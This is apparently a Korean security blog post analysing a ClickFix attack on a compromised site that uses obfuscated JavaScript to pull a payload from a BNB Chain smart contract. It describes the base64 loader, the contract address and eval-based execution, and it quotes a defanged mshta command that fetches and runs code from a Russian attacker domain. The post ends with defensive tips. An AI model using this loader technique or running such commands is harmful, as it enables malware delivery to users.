오늘으 언제나 클릭픽스(ClickFix) 에 대해서 글을 적어볼 것인데 이번 클릭픽스 공격은 난독화된 JS로 BNB 체인 데이터 가져오는 클릭픽스(ClickFix) 공격에 대해 알아보겠습니다. 해당 사이트는 일단 합법적으로 개설되니 사이트를 악용해서 BNB 체인에서 데이터를 가져 오는 공격 방법을 취하고 있습니다.
클릭픽스 사이트
hxxps://www(.)jmw(.)lk/
입니다.
클릭픽스 메인화면을 보면 나는 클릭픽스 이다.클릭픽스(ClickFix) 이다라고 강조를 하는 것을 볼 수가 있습니다.
일단 여기서 웹 소스를 열어서 Base64 부분에 있는 것을 확인할 수가 있습니다.
여기서 <script src="data:text/javascript;base64,KGZ1bmN0a(W)9uKF(8)weDM5Z(j)g4Zi(x)fMHg(x)YTZmZWQpe 하는 부분을 열어 보시면 될 것입니다.
Beautify JavaScript 로 보면 다음과 같이 정리 되는것을 확인을 할 수가 있습니다.
0xA1decFB75C8C0CA28C10517ce56B710baf727d2e
분석
BNB 스마트체인 테스트넷 RPC 노드에 접속
hxxps://data-seed-prebsc-1-s1(.)bnbchain(.)org:8545
컨트랙트 주소로 eth_call 을 보냄
함수 시그니처는 0x6d4ce63c(스마트컨트랙트 메서드)
응답값을 ABI 디코딩하여 문자열(바이너리-> Base 64 문자열)로 변환
해당 문자열을 atob (Base64 디코딩)->eval (실행) 해서 자바스크립트 페이로드를 실행
그리고 클릭 시 다음과 같은 주소를 확보할 수가 있습니다.
mshta hxxps://on(.)homohay31(.)ru/book(.)google?t=1fcshrxu원격 도메인이 나타나는 것을 확인할 수가 있으며 그리고 기본적으로 보안 제품의 피싱 사이트 기능을 사용하면 대부분 접속 전에 차단할 수가 있으며 그리고 복사 붙여 넣기 해서 cmd 같은 데서 실행을 하라고 하면 100% 클릭픽스 사이트입니다.
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 북한 김수키(Kimsuky)에서 제작한 악성코드-ofx.txt(2025.6.11) (0) | 2025.09.16 |
|---|---|
| 윈도우 10 KB5065429,윈도우 11 KB5065426,KB5065431 정기 보안 업데이트 (0) | 2025.09.11 |
| 김수키(Kimsuky) 에서 제작한 악성코드-현대 데이터 복구 및 절차 수립 (0) | 2025.09.11 |
| Microsoft Edge 140이 출시 및 몇 가지 새로운 기능이 포함 (0) | 2025.09.11 |
| 김수키(Kimsuky)에서 만든 피싱 메일-[국세청] 9월 신고 납부 기한 통지서(2025.8.25) (0) | 2025.09.08 |
| Fakecaptcha 를 이용한 ClickFix(클릭픽스) 공격-45(.)32(.)133(.)19(2025.9.2) (0) | 2025.09.04 |
| 김수키(Kimsuky) 외교광장.ps1 악성코드 분석 및 보안 수칙 ESET 탐지 PowerShell/Kimsuky.AX (0) | 2025.09.03 |
| 김수키(Kimsuky) 에서 만든 국민비서 사칭 피싱 메일-[국민비서] 경찰청 고지 안내(2025.7.3) (0) | 2025.09.02 |
